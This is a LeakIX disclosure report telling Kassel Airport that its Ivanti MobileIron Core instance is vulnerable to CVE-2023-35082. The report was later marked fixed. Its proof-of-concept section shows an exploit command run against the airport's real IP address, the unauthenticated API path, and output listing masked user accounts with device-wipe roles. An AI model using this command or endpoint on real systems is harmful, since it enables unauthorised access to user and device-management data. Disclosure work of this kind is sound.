• Creation
  • Validation
  • Communication & fix
  • Disclosure

kassel-airport.de / Ivanti MobileIron core is outdated
Chocapikk reported 2023-08-07

The following Ivanti MobileIron instance is publicly accessible and looks out-dated :

It is critical to update to a safe version as soon as possible since it could lead to instance and devices takeover. Those vulnerabilities are currently used in ransomware campaign and could damage your network.

Reference:

Proof Of Concept:

$ python3.10 exploit.py --verbose -u https://87.190.10.228                                       10:32:41 
Fetching data from: https://87.190.10.228:443/mifs/asfV3/api/v2/authorized/users?adminDeviceSpaceId=1
The response is not a valid JSON. The site is not vulnerable.
Fetching data from: http://87.190.10.228:8080/mifs/asfV3/api/v2/authorized/users?adminDeviceSpaceId=1
http://87.190.10.228:8080 may be vulnerable
Fetching data from: https://87.190.10.228:8080/mifs/asfV3/api/v2/authorized/users?adminDeviceSpaceId=1
Connection Error...
http://87.190.10.228:8080 may be vulnerable to CVE-2023-35082
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.kassel-airport.de
Roles: ROLE_MPW_RETIRE, ROLE_USER_GOOGLE_DEVICE_ACCOUNT, ROLE_MPW_UNLOCK, ROLE_MPW_RESET_AC_PASSCODE, 
ROLE_MPW_LOCATE, ROLE_MPW_CHANGE_OWNERSHIP, ROLE_USER_PORTAL_RW, ROLE_MPW_LOCK, ROLE_MPW_RESET_PIN, 
ROLE_MPW_WIPE, ROLE_MPW_REG
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.kassel-airport.de
Roles: ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW, ROLE_MPW_LOCK, ROLE_MPW_REG
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.kassel-airport.de
Roles: ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW, ROLE_MPW_LOCK, ROLE_MPW_REG
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.kassel-airport.de
Roles: ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW, ROLE_MPW_LOCK, ROLE_MPW_REG
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.kassel-airport.de
Roles: ROLE_MPW_RETIRE, ROLE_USER_GOOGLE_DEVICE_ACCOUNT, ROLE_MPW_UNLOCK, ROLE_MPW_RESET_AC_PASSCODE, 
ROLE_MPW_LOCATE, ROLE_MPW_CHANGE_OWNERSHIP, ROLE_USER_PORTAL_RW, ROLE_MPW_LOCK, ROLE_MPW_RESET_PIN, 
ROLE_MPW_WIPE, ROLE_MPW_REG
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.kassel-airport.de
Roles: ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW, ROLE_MPW_LOCK, ROLE_MPW_REG
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.kassel-airport.de
Roles: ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW, ROLE_MPW_LOCK, ROLE_MPW_REG
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.kassel-airport.de
Roles: ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW, ROLE_MPW_LOCK, ROLE_MPW_REG
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.kassel-airport.de
Roles: 
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.kassel-airport.de
Roles:
IP:
87.190.10.228
Port:
443
Detected protocol:
https
Vulnerable URL:
https://87.190.10.228 
Found vulnerable Ivanti MobileIron Core instance:
Affected by CVE-2023-35082
CVE-2023-35082 found on port 8080
Found by MobileIronCorePlugin 2023-08-07
Report created by Chocapikk  2023-08-07
Report approved by BloodyShell  2023-08-07
New PDF report generated by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report dispatched to ...@... by system 2023-08-07
Report marked as fixed by BloodyShell  2023-08-13
Report edited by BloodyShell  2023-08-13
New PDF report generated by system 2023-08-13
Report closed by BloodyShell  2023-08-13
New PDF report generated by system 2023-08-13
Report edited by Chocapikk  2023-08-13
New PDF report generated by system 2023-08-13
Information
Owner kassel-airport.de
Created 2023-08-07 20:33
Updated 2023-08-13 22:00
Fixed true
Contacts
a...@kassel-airport.de
S...@kassel-airport.de
b...@kassel-airport.de
A...@kassel-airport.de
C...@kassel-airport.de
T...@kassel-airport.de
Y...@kassel-airport.de
c...@kassel-airport.de
C...@kassel-airport.de
A...@kassel-airport.de
Status
Status closed
Hosting contacted false
CERT contacted false
Download report

© 2024 LeakIX
About LeakIX - Credits - Take-down and blacklist requests - Security issues - Terms and conditions - Cookie policy - Legal notice